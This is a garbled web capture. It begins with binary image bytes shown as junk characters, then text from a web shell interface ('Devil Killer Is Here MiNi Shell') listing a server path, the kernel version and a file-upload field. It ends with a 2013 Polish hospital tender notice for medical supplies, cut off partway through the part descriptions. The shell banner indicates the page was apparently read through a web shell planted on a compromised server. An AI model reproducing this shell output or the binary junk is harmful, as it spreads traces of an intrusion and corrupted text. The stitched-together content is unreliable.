JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130514/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130514/74749-N-2013.html

<p class="kh_header"><b>Starachowice: Dostawa materiałów medycznych</b><br>
<b>Numer ogłoszenia: 74749 - 2013; data zamieszczenia: 14.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zakład Opieki Zdrowotnej , ul. Radomska 70, 27-200 Starachowice, woj. świętokrzyskie, tel. 041 2745202 w. 182, faks 041 2746158.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zoz.starachowice.sisco.info/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów medycznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów medycznych dla potrzeb Powiatowego Zakładu Opieki Zdrowotnej w Starachowicach ujętych w 27 pakietach - zadaniach.
Pakiet 1 - Zestaw do bandingu żylaków
Pakiet 2 - Pętle elektrochirurgiczne
Pakiet 3 - Klipsy jednorazowe
Pakiet 4 - Rękawice nitrylowe
Pakiet 5 - Opatrunki
Pakiet 6 - Siatki chirurgiczne
Pakiet 7 - Staplery okrężne
Pakiet 8 - Zestawy do szynowania moczowodów
Pakiet 9 - Taśma IVS
Pakiet 10 - Nożyczki do episjotomii
Pakiet 11 - Igły do znieczuleń
Pakiet 12 - Zestawy do znieczuleń
Pakiet 13 - Akcesoria anestezjologiczne
Pakiet 14 - Drobny sprzęt medyczny
Pakiet 15 - Zestawy Redon
Pakiet 16 - Akcesoria do diatermi chirurgicznej VIO
Pakiet 17 - Akcesoria neonatologiczne
Pakiet 18 - Strzykawki ŻANETY
Pakiet 19 - Pomiar ciśnienia krwi
Pakiet 20 - Zestaw do biopsji aspiracyjnej macicy
Pakiet 21 - Igły do akupunktury
Pakiet 22 - Sondy sengstakena
Pakiet 23 - System do nawilżania
Pakiet 24 - Akcesoria medyczne
Pakiet 25 - Cewniki dopępowinowe
Pakiet 26 - Cewnik trzustkowy
Pakiet 27 - Trójnik ECPW
Szczegółowy wykaz produktów zawiera załącznik nr 5 do SIWZ z opisem wymagań minimalnych i ilością przewidywanego zużycia w okresie jednego roku..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.16.22.00-6, 33.14.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 27.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie na podstawie złożonych przez Wykonawcę w niniejszym postępowaniu dokumentów i oświadczeń metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością (min wartość oferowanych pakietów), dostawom lub usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z dokumentami potwierdzającymi, że dostawy lub usługi te zostały wykonane należycie. Szczegółowy wykaz produktów zawiera załącznik nr 5 do SIWZ z opisem wymagań minimalnych i ilością przewidywanego zużycia w okresie jednego roku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych (min. wartość oferowanych pakietów) lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zoz.starachowice.sisco.info/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zakład Opieki Zdrowotnej z siedzibą w Starachowicach, ul. Radomska 70, 27-200 Starachowice, Dział Zamówien Publicznych i Zaopatrzenia, pok. nr 218.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2013 godzina 11:00, miejsce: Powiatowy Zakład Opieki Zdrowotnej z siedzibą w Starachowicach, ul. Radomska 70, 27-200 Starachowice, Kancelaria, pok. nr 245.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zestaw do bandingu żylaków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do bandingu żylaków przełyku typu six shuter - mozliwość założenia czterech- szęściu gumek bez wyjmowania aparatu nie wymagający wprowadzania dodatkowych elementów podczas zabiegu. 		szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pętle elektrochirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pętle elektrochirurgiczne kolonoskopowe wielorazowe z plecionego drutu o średnicy 0,4 mm, kształt duży heksagonalny  o średnicy 22 mm bez osłonki, długość narzędzia 230 cm, minimalna średnica kanału roboczego
 2,8 mm		szt	5
Osłonka z czarnego tworzywa, wielorazowa do pętli elektrochirurgicznych, kolonoskopowych SD-5U i SD-6U, długośćnarzędzia 230 cm, minimalna średnica kanału roboczego 2,8 mm, pakowane pojedyńczo, kompatybilne rękojeścią typ SD do pętli elektrochirurgicznych serii SD, noża igłowego KD-31C-1 oraz szczypczyków do goracej biopsji serii FD które Zamawiający posiada		szt	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Klipsy jednorazowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Klipsy jednorazowego użytku kompatybilne z klipsownicą HX11 OUR firmy OLYMPUS, którą Zamawiający posiada, kąt rozwarcia klipsów w zakresie 90-135 stopni, długość ramion klipsa od 7,5 mm do 10 mm, pakowane po 40 szt		op	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Rękawice nitrylowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rękawice nitrylowe, diagnostyczne, niesterylne, bezpudrowe.  Odporne na uszkodzenia mechaniczne. Grubość rękawicy w części dłoni 0,08mm; w części palców 0,11mm, mankiecie 0,07mm. Rolowany mankiet Powierzchnia: teksturowana tylko na palcach, kolor - ciemnoniebieski. Kształt: anatomiczny, zróżnicowany na lewą i prawą dłoń
AQL: 1,5  Deklaracja zgodności CE lub równoważne, zgodne z normą PN-EN 455.1-2, EN-374-3, ASTM F1671 potwierdzone 4 badaniami z jednostki niezależnej od producenta, op 200szt, roz. S, M, L. Informacje o odporności na poszczególne substancje chemiczbne opisane na opakowaniu. Rozmiar kodowany kolorystycznie na opakowaniu. Rozmiar opakowania 12 x 13 x 15,5cm (+/- 3mm) pasujący do uchwytu naściennego typ SafeDon		opak	1600
Rękawice chirurgiczne sterylne neoprenowe. Rozm. wg zapotrzebowań zamawiającego		par	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Opatrunki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jałowe tupfery kule  17N z 20x20cm a 30szt zapakowane w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5 . Na zewnątrz opakowania etykieta z dwiema naklejkami umożliwiającymi wklejenie do dokumentacji z nr lot lub serii, datą ważności, identyfikacją producenta.Materiał gazowy kl 2a Reg 7,sterylizowany w parze wodnej.		op.	1000
Jałowe KG 17N 24W z RTG, rozm. 10x20cm pakowane pojedyńczo, opakowanie typ miękki blister		op.	500
Jałowa opaska elastyczna  15cmx5m pakowane pojedynczo, w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5. Na zewnatrz opakowania etykieta z dwiema naklejkami umożliwiajacymi wklejenie do dokumentacji z nr LOT lub serii, datą ważności, identyfikacją producenta		op.	600
Jałowe tupfery kule  17N z RTG 20x20cm a 10szt zapakowane w opakowanie typu miękki blister		op.	1500
Jałowe tupfery kule  17N z 20x20cm a 3szt zapakowane w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5 . Na zewnątrz opakowania etykieta z dwiema naklejkami umożliwiającymi wklejenie do dokumentacji z nr lot lub serii, datą ważności, identyfikacją producenta.Materiał gazowy kl 2a Reg 7, sterylizowany w parze wodnej.		op.	1000
Jałowe tupfery kule  17N z 20x20cm a 20szt zapakowane w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5 . Na zewnątrz opakowania etykieta z dwiema naklejkami umożliwiającymi wklejenie do dokumentacji z nr lot lub serii, datą ważności, identyfikacją producenta.Materiał gazowy kl 2a Reg 7, sterylizowany w parze wodnej.		op.	1000
Jałowe tupfery fasolki 17N z RTG 9,5x9,5cm a 10szt, zapakowane w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5 . Na zewnątrz opakowania etykieta z dwiema naklejkami umożliwiającymi wklejenie do dokumentacji z nr lot lub serii, datą ważności, identyfikacją producenta.Materiał gazowy kl 2a Reg 7, sterylizowany w parze wodnej.		op	1000
Jałowe kompresy gazowe 16W z RTG,Roz.10x10cm a 10szt, minimalna waga pojedyńczego kompresu  3,68 g, zapakowane w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5 . Na zewnątrz opakowania etykieta z dwiema naklejkami umożliwiającymi wklejenie do dokumentacji z nr lot lub serii, datą ważności, identyfikacją producenta.Materiał gazowy kl 2a Reg 7, sterylizowany w parze wodnej.		op	3000
